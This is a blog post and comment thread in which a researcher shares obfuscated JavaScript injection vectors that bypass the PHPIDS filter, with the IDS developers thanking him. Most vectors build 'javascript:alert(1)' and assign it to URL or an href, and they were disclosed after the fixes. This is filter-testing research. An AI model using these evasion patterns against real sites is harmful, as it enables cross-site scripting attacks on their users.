So you think you’re a hacker?

I’ve been testing the PHPIDS after Sirdarckcat tempted me with his post :) At first I created 2 simple vectors to make injection more difficult, then I spent a couple of hours coming up with a full tag and Javascript injection. I shall post the vector here once they have fixed it because it is quite dangerous and I don’t want their site open to attack. So if you think you are a good hacker, try and inject some javascript on their Smoke test, it isn’t as easy as it first looks.

Prove it

21 Responses to “So you think you’re a hacker?”

  1. Gareth Heyes writes:

    I’ve found another serious one. I’ll share when it’s fixed. Here’s the other one I did which has now been fixed:-

    s1=0?”:’i';s2=0?”:’fr';s3=0?”:’ame';i1=s1+s2+s3;s1=0?”:’jav';s2=
    0?”:’ascr';s3=0?”:’ipt';s4=0?”:':';s5=0?”:’ale';s6=0?”:’rt';s7=
    0?”:'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=pa
    rentNode;x.appendChild(i);

  2. .mario writes:

    Hi!

    Great work again – thx a lot! It led me to refactor the converter unit of the PHPIDS and I think I have found a pretty stable beta of the regex to check and de-assemble concatenations.

    I am very looking forward for the 0.4.0 release we are currently working on – the help of you guys is what helps improving it eminently.

    Greetz,
    .mario

  3. Gareth Heyes writes:

    This is also fixed now:-
    s1=”+’java’+”+’scr’+”;s2=”+’ipt’+':’+’ale’+”;s3=”+’rt’+”+'(1)’+”;
    u1=s1+s2+s3;URL=u1

  4. Gareth Heyes writes:

    Good work Mario/PHPIDS team, I really admire all your efforts on this because I know how difficult it is to protect against this stuff.

    I’ll look forward to hacking it again though πŸ˜‰

  5. .mario writes:

    always appreciated!

  6. Ronald writes:

    It almost looks like ASCII art, good job! :)

  7. Gareth Heyes writes:

    Hehe thanks :)

    I might try again soon cause I love a interesting challenge

  8. Gareth Heyes writes:

    Found another one (IE only):-
    I’ve had to base64 encode it because it causes conversation errors:-
    czE9IScnJiYnamF2JztzMj0hJycmJidhc2NyaXB0JztzMz0hJycmJic6JztzND0hJycmJidhbGVy
    JztzNT0hJycmJid0JztzNj0hJycmJicoMSknO3M3PXMxK3MyK3MzK3M0K3M1K3M2O1VSTD1zNzs=

  9. Gareth Heyes writes:

    and another:-
    s1=”+”jav”+”;s2=”+”ascri”+”;s3=”+”pt”+”;s4=”==”?':':0;s5=”+”aler”+”;s6=”+”t”+”;s7=”==”?'(1)':0;s8=s1+s2+s3+s4+s5+s6+s7;URL=s8

  10. Ronald writes:
    for(i=0;i
    

  11. Gareth Heyes writes:

    Check this one out, creates javascript: and passes it to the URL property, only works in IE though.

    s3=1==true&&':';s2=1==true&&'(1)';s1=1==true&&'javascript'+s3+'aler'+'t'+s2;URL=s1
    
  12. Gareth Heyes writes:

    Here’s my favorite:-

    x=(this);c=1==1&&':';s=''+/javascriptaaalerta(1)ahrefa/+'';j=s[1]+s[2]+s[3]+s[4]+s[5]
    +s[6]+s[7]+s[8]+s[9]+s[10]+c+s[12]+s[14]+s[15]+s[16]+s[17]+s[19]+s[20]+s[21];h=s[23]+s[24]+s[25]+s[26];x[h]=j
    
  13. Ronald writes:

    Yeah I think this will be an endless armsrace πŸ˜€

    btw do you know the Javascript functions:

    import() and export() ? It’s pretty cool cause you can export singed script data if import is called inside a signed script. I didn’t know this, there is a lot more to be learned in Javascript.

  14. Gareth Heyes writes:

    Nope didn’t know that but sounds cool, I’m gonna google it.

  15. Gareth Heyes writes:
    c4=1==1&&'(1)';c3=1==1&&'aler';
    c2=1==1&&':';c1=1==1&&'javascript';
    a=c1+c2+c3+'t'+c4;(URL=a);
    
  16. Gareth Heyes writes:

    Definitely an arms race, I just can’t see how they can prevent all of it because we can always come up with new ways of doing things.

    Still I’m impressed with their filters it isn’t that easy to come up with new vectors and I’ve done loads of complicated ones which don’t get through.

  17. Ronald writes:

    I meant:

    import function() or var

    export function() or var

    Like:

    function a() {

    //foo

    }

    export a;

    misleading stuff I know :)

  18. Gareth Heyes writes:

    Found any docs on that? I would be interested to read, I tried Mozilla but there’s not much stuff on it.

  19. Ronald writes:

    It is here:

    http://devedge-temp.mozilla.org/library/manuals/2000/javascript/1.3/guide/sec.html

    Be amazed what the ‘ol netscape can learn us, it’s almost forbidden knowledge. I read the whole book over the weekend, learned tons of new and old stuff.

    πŸ˜€

  20. Gareth Heyes writes:

    This one’s awesome πŸ˜€
    _=alert,1,1,_(1);

  21. Gareth Heyes writes:

    This one took ages cause it’s really tough now with their new filters:-

    s=function test2() {return ‘hrefjavascriptalert(1)a';1,1}();
    void(a = {} );
    void(c = URL );
    a.c=function xyz() {return c[4] }();
    a.h1=function xyz() {return s[0] }();
    a.h2=function xyz() {return s[1] }();
    a.h3=function xyz() {return s[2] }();
    a.h4=function xyz() {return s[3] }();
    a.u1=function xyz() {return s[4] }();
    a.u2=function xyz() {return s[5] }();
    a.u3=function xyz() {return s[6] }();
    a.u4=function xyz() {return s[7] }();
    a.u5=function xyz() {return s[8] }();
    a.u6=function xyz() {return s[9] }();
    a.u7=function xyz() {return s[10] }();
    a.u8=function xyz() {return s[11] }();
    a.u9=function xyz() {return s[12] }();
    a.u10=function xyz() {return s[13] }();
    a.u11=function xyz() {return s[14] }();
    a.u12=function xyz() {return s[15] }();
    a.u13=function xyz() {return s[16] }();
    a.u14=function xyz() {return s[17] }();
    a.u15=function xyz() {return s[18] }();
    a.u16=function xyz() {return s[19] }();
    a.u17=function xyz() {return s[20] }();
    a.u18=function xyz() {return s[21] }();
    $_=function xyz() {return a.u1 + a.u2 + a.u3 + a.u4 + a.u5 + a.u6 + a.u7 + a.u8 + a.u9 + a.u10 + a.c + a.u11 + a.u12 + a.u13 + a.u14 + a.u15 + a.u16 + a.u17 + a.u18 }();
    for(i in x=this) x[a.h1+a.h2+a.h3+a.h4]=$_;